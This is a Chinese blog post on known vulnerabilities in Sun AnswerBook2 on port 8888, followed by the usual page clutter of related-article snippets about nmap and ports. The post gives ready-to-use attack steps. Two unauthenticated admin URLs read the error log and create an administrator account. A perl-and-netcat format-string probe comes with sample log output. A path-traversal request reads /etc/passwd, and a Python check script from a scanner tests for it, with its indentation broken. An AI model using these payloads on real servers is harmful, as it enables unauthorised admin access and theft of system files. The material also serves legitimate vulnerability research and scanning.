Sun-AnswerBook 8888 端口

最新推荐文章于 2023-08-29 11:44:04 发布
最新推荐文章于 2023-08-29 11:44:04 发布
阅读量952 收藏
点赞数
分类专栏: nday 文章标签: 服务器 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42792266/article/details/126900595
版权

一、未授权管理脚本访问漏洞:

1、受影响版本:

Sun-AnswerBook2 1.2-1.4.2

2、攻击测试手段

http://a.b.c.d:8888/ab2/@AdminViewError#访问错误日志

http://a.b.c.d:8888/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar#添加账户(密码)

二、远程格式化字符串漏洞

1、受影响版本:

Sun-AnswerBook2 1.2-1.4.2

2、攻击测试手段:

 perl -e 'print"GET /";print"%x"x20;print" HTTP/1.0\r\n\r\n\r\n"' | nc localhost 8888 
1.
应该可以看到如下报错:

http-8888 [23/Sep/2000:13:09:37 -0700] warning: send-file reports: The 
requested object "/usr/lib/ab2/data/docs/0fea19f580073656e642d66696c6520 
7265706f7274733a2054686520726571756573746564206f626a65637420222f7573722f6 
c69622f6162322f646174612f646f63732f" could not be opened! 

三、任意文件读取(有些HTTP-Proxy也有这个漏洞):

直接连接connect漏洞主机的对应的端口()

发送Payload
GET /../../../../../../../../../etc/passwd HTTP/1.1\r\n\r\n

就可以得到对应的文件内容


参考巡风的POC:


  def check(ip, port, timeout):
     try:
          socket.setdefaulttimeout(timeout)
         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
          s.connect((ip, int(port)))
         flag = "GET /../../../../../../../../../etc/passwd HTTP/1.1\r\n\r\n"
          s.send(flag)
         data = s.recv(1024)
          s.close()
          if 'root:' in data and 'nobody:' in data:
              return u"漏洞"
      except:
          pass
 

wolf-g
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
漏洞利用——Sun-AnswerBook
技术超强的网络安全平台
12-08 6834
AnswerBook简介 AnswerBook2 产品是 Sun 在线文档系统。它是一个基于客户服务器的系统,客户是任何一个 HTML 3.2-compliant 网络浏览器,而服务器是一个基于 httpd 的网络服务器。您可以在一个中央文档服务器或本地服务器上安装 AnswerBook2 文档集合。 AnswerBoo...
Answerbook-crx插件
04-03
语言:English 适用于Answerbook Enterprise的配套应用 该Chrome扩展程序可为Answerbook Enterprise用户提供实时通知。
应答手册「Answerbook」-crx插件
03-23
配套应用程序的Answerbook企业 该Chrome扩展程序可为Answerbook Enterprise用户提供实时通知。 支持语言:English
常用端口号汇总:常用端口号与对应的服务
zy1992As的博客
08-29 4111
21端口:FTP 文件传输服务22端口:SSH 远程连接服务23端口:TELNET 终端仿真服务25端口:SMTP 简单邮件传输服务53端口:DNS 域名解析服务80端口:HTTP 超文本传输服务443端口:HTTPS 加密的超文本传输服务3306端口:MYSQL数据库端口5432端口:PostgreSQL数据库端口6379端口:Redis数据库端口8080端口:TCP服务端默认端口8888端口:Nginx服务器端口9200端口:Elasticsearch服务器端口
Nmap——主机、端口扫描工具
weixin_30270561的博客
04-15 161
nmap其基本功能有三个,一是探测一组主机是否在线;其次是扫描主机端口,嗅探所提供的网络服务;还可以推断主机所用的操作系统 。 这是百度给的介绍:http://baike.baidu.com/link?url=Zwmb5fFFmYSdNcp1J40tAGJ6isEUp3mAz57mCgs6hAB9XiH6cms1wwLtDzVX9pKdFvvkezdkQsJe36znq__Di_ 自己用过的...
AnswerBook2(端口8888)相关漏洞
per_se_veran_ce的博客
11-12 4663
AnswerBook简介 AnswerBook2 产品是 Sun 在线文档系统。它是一个基于客户服务器的系统,客户是任何一个 HTML 3.2-compliant 网络浏览器,而服务器是一个基于 httpd 的网络服务器。您可以在一个中央文档服务器或本地服务器上安装 AnswerBook2 文档集合。 AnswerBook2 管理特性 1、用客户服务器结构,您能将文档存储于一个单一位置(服务器)而从用户桌面(客户)访问。 2、提供命令行接口(ab2admin)和一个基于浏览器的界面(AnswerBoo
nmap常用命令
qq_44969004的博客
04-25 673
1.使用主机名扫描: [root@server1 ~]# nmap server2.tecmint.com Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 15:42 EST Interesting ports on server2.tecmint.com (192.168.0.101): Not shown: 1674 closed ports PORT STATE SERVICE 22/tcp open
Nmap命令的常用实例
CSDN
06-04 5090
Nmap(Network Mapper)是一款强大的开源网络扫描工具,用于网络发现和安全性评估。它具有丰富的功能,可以帮助系统管理员、网络管理员和渗透测试人员了解目标网络上的主机、服务和漏洞。用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统。
【VulnHub靶场】——BOREDHACKERBLOG: SOCIAL NETWORK
Demo不是emo的博客
10-29 7067
二十四次系统性打靶第一次,每次打靶后都会分享靶场攻略和总结的知识点,如果对渗透测试和打靶比较感兴趣的小伙伴们也可以跟着我一起训练哦
Solaris系统命令中英对照.doc
05-14
ab2admin—对AnswerBook2进行管理的命令行界面 ab2cd—从Documentation CD中运行AnswerBook2服务器 ab2regsvr—向联合域名服务注册AnswerBook2文档服务器 accept、reject—接受或拒绝打印请求 acct—对计数及...
(5)nmap
世界那么大,我要学编程看看!
06-09 964
使用nmap工具识别系统指纹信息
玄魂培训第一期ctf题实战
f1gure的博客
04-29 1603
IP:10.9.0.201 先上nmap:PORT  STATE SERVICE22/tcp  open   ssh3306/tcp  open mysql7777/tcp  open cbt8888/tcp  open sun-answerbookMAC Address: 00:FF:18:CA:FB:2E (Unknown)Device type: bridge|general purpose...
linux 服务器 检查是否被攻击 常用命令
whatday的专栏
07-26 2372
centos/RHELLinux查看Secure和audit日志。8.使用top或htop命令查看进程对CPU/内存的消耗情况。5.使用netstat命令查看本机各端口连接情况。7.使用ps命令查看当前系统中正在运行的进程信息。1.使用last命令查看登录服务器的用户记录。关键字”Acceptedpassword“2.使用who命令查看当前登录的用户。关键字”type=USER_AUTH“6.使用lsof命令查看打开的文件。12.使用nmap命令查看打开的端口。3.查看命令执行记录。...
第二阶段总结
weixin_49891807的博客
09-20 831
1.操作系统部分 2.windows命令部分 3.powershell部分 4.主机防火墙和域 域控制器的搭建 入站配置图 常用端口号 0 无效端口,通常用于分析操作系统 1 传输控制协议端口服务多路开关选择器 2 管理实用程序 3 压缩进程 5 远程作业登录 7 回显 9 丢弃 11 在线用户 13 时间 17 每日引用 18 消息发送协议 19 字符发生器 20
自己启动服务器不要用TCP的8888端口,迅雷会狂连本地这个端口好多问题
brook0344的专栏
10-22 5008
用别的端口测试本地服务器   11月3日:又发现优酷客户端会占用7800端口
linux centos7 开启 mysql 3306 端口 外网访问 的实践
weixin_30363509的博客
06-29 1022
第〇步:思路   3306端口能否被外网访问,主要要考虑:   (1)mysql的3306端口是否开启?是否没有更改端口号?   (2)mysql是否允许3306被外网访问?   (3)linux是否已经开启了 3306端口(通常情况下mysql能够启动就不用考虑这个)   (4)linux是否对外网放行 3305   (5)云服务器厂商是否对3306进行了限制   我...
MinIO未授权SSRF漏洞复现(CVE-2021-21287)
isxiaole的博客
09-27 7451
MinIO 是一款基于Go语言发开的高性能、分布式的对象存储系统。由于MinIO组件中LoginSTS接口设计不当,导致存在服务器端请求伪造漏洞。攻击者可以通过构造URL来发起服务器端请求伪造攻击成功利用此漏洞的攻击者能够通过利用服务器上的功能来读取、更新内部资源或执行任意命令。
nmap
weixin_33872566的博客
11-14 238
我将用两个不同的部分来涵盖大部分NMAP的使用方法,在下面的设置中,我使用两台已关闭防火墙的服务器来测试Nmap命令的工作情况。192.168.0.100 – server1.tecmint.com192.168.0.101 – server2.tecmint.com如何在Linux下安装NMAP现在大部分Linux的发行版本像Red Hat,CentOS,Fedoro,...
nmap输出wat?
最新发布
12-03
根据提供的引用内容,nmap是一款网络探测和安全审核工具,可以用于扫描远程机器的端口。下面是两个nmap的输出示例: 1. 使用“-P”选项指定扫描的端口,默认情况下nmap只扫描TCP端口: ``` [root@server1~]#nmap -p 80 server2.tecmint.com Starting Nmap 4.11 (http://www.insecure.org/nmap/) at 2013-11-11 17:12 EST Interesting ports on server2.tecmint.com (192.168.0.101): PORT STATE SERVICE 80/tcp open http MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems) Nmap finished: 1 IP address (1 host up) scanned in 0.076 seconds ``` 2. 使用“-F”选项执行一次快速扫描,仅扫描列在nmap-services文件中的端口而避开所有其它的端口: ``` [root@server1~]#nmap -F 192.168.0.101 Starting Nmap 4.11 (http://www.insecure.org/nmap/) at 2013-11-11 16:47 EST Interesting ports on server2.tecmint.com (192.168.0.101): Not shown: 1234 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 3306/tcp open mysql 8888/tcp open sun-answerbook MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems) Nmap finished: 1 IP address (1 host up) scanned in 0.322 seconds ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值